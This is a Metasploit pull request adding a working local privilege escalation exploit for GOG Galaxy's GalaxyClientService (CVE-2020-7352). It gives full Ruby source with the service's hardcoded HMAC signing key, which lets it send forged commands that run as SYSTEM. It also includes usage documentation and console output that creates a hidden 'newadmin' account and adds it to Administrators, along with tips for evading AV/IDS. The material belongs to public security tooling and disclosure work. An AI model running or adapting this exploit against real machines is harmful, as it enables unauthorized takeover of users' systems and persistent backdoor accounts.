### PR TITLE
GOG Galaxy Client Privilege Escalation Module

### DIFF
--- a/documentation/modules/exploit/windows/local/gog_galaxyclientservice_privesc.md
+++ b/documentation/modules/exploit/windows/local/gog_galaxyclientservice_privesc.md
@@ -1,0 +1,72 @@
+## Vulnerable Application
+
+GOG Galaxy is a video game management client.  One of its Windows services, *GalaxyClientService*, runs with *SYSTEM* privileges.  In versions 2.0.12 and earlier, and 1.2.64 and earlier, it is possible to communicate with the service and instruct it to execute arbitrary commands as *SYSTEM*.
+
+A vulnerable version need only be installed on the target machine in order to be exploitable.
+
+## Verification Steps
+
+  1. Start *msfconsole*.
+  2. Acquire a Meterpreter session.
+  3. Do: ```use exploit/windows/local/gog_galaxyclientservice_privesc```
+  4. Do: ```set SESSION [insert session number here]```
+  5. (Optional) For AV/IDS evasion, modify the default username and password in the ```ARGS``` option.
+  6. Do: ```exploit```
+  7. Check that the new user is created.
+  8. (Optional) To place new user in the local Administrators group, run ```set ARGS "net localgroup Administrators [put username here] /add"``` followed by ```exploit``` again.
+
+## Options
+
+### CMD
+
+The absolute path of the command to execute.
+
+### ARGS
+
+The arguments to pass to the command.
+
+### WORKING_DIR
+
+The initial working directory of the command.
+
+### SESSION
+
+The Meterpreter session number to execute the command in.
+
+
+## Scenarios
+```
+> use exploit/windows/local/gog_galaxyclientservice_privesc 
+msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set SESSION 1
+SESSION => 1
+msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > exploit
+
+[*] Started reverse TCP handler on 10.0.2.18:4444 
+[*] Attempting to execute "C:\Windows\System32\net.exe user newadmin 0mg*123L0l /add" with SYSTEM privileges...
+[!] Warning: default command & args used.  To better evade AV/IDS, consider customizing these next time.
+[*] Starting GalaxyClientService...
+[*] Service started successfully.
+[*] Connecting to service...
+[*] Connected to service.  Sending payload...
+[+] Command executed successfully!
+[+] Hint: to add the new user to the local Administrators group, set the ARGS option to "net localgroup Administrators [user] /add"
+[*] Exploit completed, but no session was created.
+
+msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set ARGS "net localgroup Administrators newadmin /add"
+ARGS => net localgroup Administrators newadmin /add
+msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > exploit
+
+[*] Started reverse TCP handler on 10.0.2.18:4444 
+[*] Attempting to execute "C:\Windows\System32\net.exe net localgroup Administrators newadmin /add" with SYSTEM privileges...
+[*] Starting GalaxyClientService...
+[*] Service started successfully.
+[*] Connecting to service...
+[*] Connected to service.  Sending payload...
+[+] Command executed successfully!
+[+] Hint: to add the new user to the local Administrators group, set the ARGS option to "net localgroup Administrators [user] /add"
+[*] Exploit completed, but no session was created.
+```
+
+### Version and OS
+
+This exploit works on the Windows version of GOG Galaxy v1.2.64 and earlier, and v2.0.12 and earlier.

--- a/modules/exploits/windows/local/gog_galaxyclientservice_privesc.rb
+++ b/modules/exploits/windows/local/gog_galaxyclientservice_privesc.rb
@@ -6,7 +6,9 @@
 require 'msf/core/post/windows/services'
 require 'openssl'
 
-class MetasploitModule < Msf::Post
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
   include Msf::Post::Windows::Services
 
   def initialize(info = {})
@@ -24,6 +26,9 @@ class MetasploitModule < Msf::Post
       ],
       'Platform'     => [ 'win' ],
       'SessionTypes' => [ 'meterpreter' ],
+      'Targets'      => [ [ 'Automatic', {} ], ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => "Apr 28 2020",
       'References'   =>
             [
               ['URL', 'https://www.positronsecurity.com/blog/2020-04-28-gog-galaxy-client-local-privilege-escalation/'],
@@ -39,7 +44,7 @@ class MetasploitModule < Msf::Post
       ])
   end
 
-  def run
+  def exploit
     command = datastore['CMD']
     args = datastore['ARGS']
     working_dir = datastore['WORKING_DIR']

--- a/modules/post/windows/escalate/gog_galaxyclientservice_privesc.rb
+++ b/modules/post/windows/escalate/gog_galaxyclientservice_privesc.rb
@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Post
       'SessionTypes' => [ 'meterpreter' ],
       'References'   =>
             [
-              ['URL', 'https://www.positronsecurity.com/blog/2020-04-28-gog-galaxy-client-local-privilege-escalation/']
+              ['URL', 'https://www.positronsecurity.com/blog/2020-04-28-gog-galaxy-client-local-privilege-escalation/'],
+              ['CVE', '2020-7352']
             ]
     ))
 

--- a/modules/post/windows/escalate/gog_galaxyclientservice_privesc.rb
+++ b/modules/post/windows/escalate/gog_galaxyclientservice_privesc.rb
@@ -1,0 +1,140 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/windows/services'
+require 'openssl'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Services
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'         => 'GOG GalaxyClientService Privilege Escalation',
+      'Description'  => %q{
+          This module will send arbitrary commands to the GOG GalaxyClientService, which will be executed
+        with SYSTEM privileges (verified on GOG Galaxy Client v1.2.62 and v2.0.12; prior versions are
+        also likely affected).
+        },
+      'License'      => MSF_LICENSE,
+      'Author'       => [
+        'Joe Testa <jtesta[at]positronsecurity.com>'
+      ],
+      'Platform'     => [ 'win' ],
+      'SessionTypes' => [ 'meterpreter' ],
+      'References'   =>
+            [
+              ['URL', 'https://www.positronsecurity.com/blog/2020-04-28-gog-galaxy-client-local-privilege-escalation/']
+            ]
+    ))
+
+    register_options(
+      [
+        OptString.new('CMD', [true, 'The command to execute with SYSTEM privileges', 'C:\\Windows\\System32\\net.exe']),
+        OptString.new('ARGS', [false, 'The arguments for CMD', 'user newadmin 0mg*123L0l /add']),
+        OptString.new('WORKING_DIR', [true, 'The initial working directory of the command', 'C:\\']),
+      ])
+  end
+
+  def run
+    command = datastore['CMD']
+    args = datastore['ARGS']
+    working_dir = datastore['WORKING_DIR']
+
+    # The HMAC-SHA512 key for signing commands.
+    key = "\xc8\x86\x07\xe1\x18\x22\x7a\x38\x05\xc4\x7f\x89\x3d\xa4\x1f\xcb\xdf\x16\x9e\xc9\xbb\xcb\xfd\xb1\x9a\x9f\x5b\x1f\xeb\x9f\x6c\x1e\x3c\x14\x46\x44\x6f\x9d\x8d\xfd\x67\x8e\xc6\xd4\x0c\x38\x20\xcb\x9a\x29\xb5\x2f\x5d\xb2\xfd\xb6\xf8\x0f\xf9\x5b\xf8\x50\xaa\x5d"
+
+    print_status("Attempting to execute \"#{command} #{args}\" with SYSTEM privileges...")
+    if command == 'C:\\Windows\\System32\\net.exe' and args == 'user newadmin 0mg*123L0l /add'
+      print_warning('Warning: default command & args used.  To better evade AV/IDS, consider customizing these next time.')
+    end
+
+    # Start the GalaxyClientService.  It will automatically terminate after ~10
+    # seconds of inactivity, so we don't need to bother shutting it down later.
+    print_status("Starting GalaxyClientService...")
+    ret = service_start('GalaxyClientService')
+    if ret == 0 then
+      print_status("Service started successfully.")
+    elsif (ret == 1056) or (ret == 1) then
+      print_warning("Service already running.  If the command execution fails, try it again in 15 seconds or so.")
+    else
+      print_status("Service status unknown (return code: #{ret}).  Continuing anyway...")
+    end
+
+    print_status("Connecting to service...")
+
+    # Create a TCP socket.
+    handler = client.railgun.ws2_32.socket('AF_INET', 'SOCK_STREAM', 'IPPROTO_TCP')
+    s = handler['return']
+
+    # Set timeout to 10 seconds (0xffff = SOL_SOCKET, 0x1006 = SO_RCVTIMEO).
+    # This only affects the recv(), not connect().
+    handler = client.railgun.ws2_32.setsockopt(s, 0xffff, 0x1006, [10000].pack('L<'), 4)
+
+    # Set the socket address structure to localhost:9978.
+    sock_addr = "\x02\x00"
+    sock_addr << [9978].pack('n')
+    sock_addr << Rex::Socket.addr_aton('127.0.0.1')
+    sock_addr << "\x00" * 8
+
+    # Connect to the service.  Retry up to 3 times, waiting 2 seconds in
+    # between.
+    connected = false
+    retries = 0
+    while (retries < 3) and (connected == false)
+      retries += 1
+      handler = client.railgun.ws2_32.connect(s, sock_addr, 16)
+      if handler['GetLastError'] == 0 then
+        connected = true
+      else
+        print_warning("Connection failed.  Waiting 2 seconds and trying again...")
+        Rex.sleep(2)
+      end
+    end
+
+    if connected == false
+      print_error("Failed to connect to service.")
+      return
+    end
+
+    print_status("Connected to service.  Sending payload...")
+
+    # Build the header and payload, then calculate the HMAC-512 tag.
+    header1 = "\x00\x93\x08\x04\x10\x01\x18"
+    header2 = " \xa1\x90\xec\xe6\x05\xc2\x0c\x83\x01\n\x80\x01"
+    payload = "\n" + command.length.chr + command + "\x12" + (command.length + args.length + 4).chr + "\"" + command + "\" " + args + " \x1a" + working_dir.length.chr + working_dir + " \x01(\x01"
+    payload_hmac = OpenSSL::HMAC.hexdigest("SHA512", key, payload)
+    data = header1 + payload.length.chr + header2 + payload_hmac + payload
+
+    # Here, we are calling client.railgun.ws2_32.send().  However, there's a bug
+    # somewhere in the railgun system such that send() is never called.  It
+    # seems that some mystery code is intercepting send() instead of letting it
+    # get to LibraryWrapper.method_missing() (perhaps 'send' is a special case
+    # somewhere? The other ws2_32 functions work just fine...).  To work around
+    # this problem, we will simply call it directly with call_function().
+    send_func = client.railgun.ws2_32.functions['send']
+    client.railgun.ws2_32._library.call_function(send_func, [s, data, data.length, 0], client)
+
+    # Read the server's response.  On error, it returns nothing.
+    response = "\x00" * 512
+    handler = client.railgun.ws2_32.recv(s, response, response.length, 0)
+
+    # Convert the unsigned return value to a signed value.
+    ret = [handler['return'].to_i].pack('l').unpack('l').first
+    if ret <= 0 then
+      print_error("Failed to read response from service (return value from recv(): #{ret}).  This probably means the exploit failed.  :(")
+    else
+      print_good("Command executed successfully!")
+
+      # If a new account was created, give the user a hint on how to add it to
+      # the local Administrators group.
+      if command.end_with? "net.exe" and args.include? ' /add'
+        print_good("Hint: to add the new user to the local Administrators group, set the ARGS option to \"net localgroup Administrators [user] /add\"")
+      end
+    end
+
+    client.railgun.ws2_32.closesocket(s)
+  end
+end


### PR DESCRIPTION
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Gain shell on Windows host with GOG Galaxy Client v2.0.12 or earlier.
- [ ] `run post/windows/escalate/gog_galaxyclientservice_privesc`
- [ ] Verify that a user named `newadmin` was created.
- [ ] Optionally, run again with ARGS="localgroup Administrators newadmin /add" to promote to local administrator.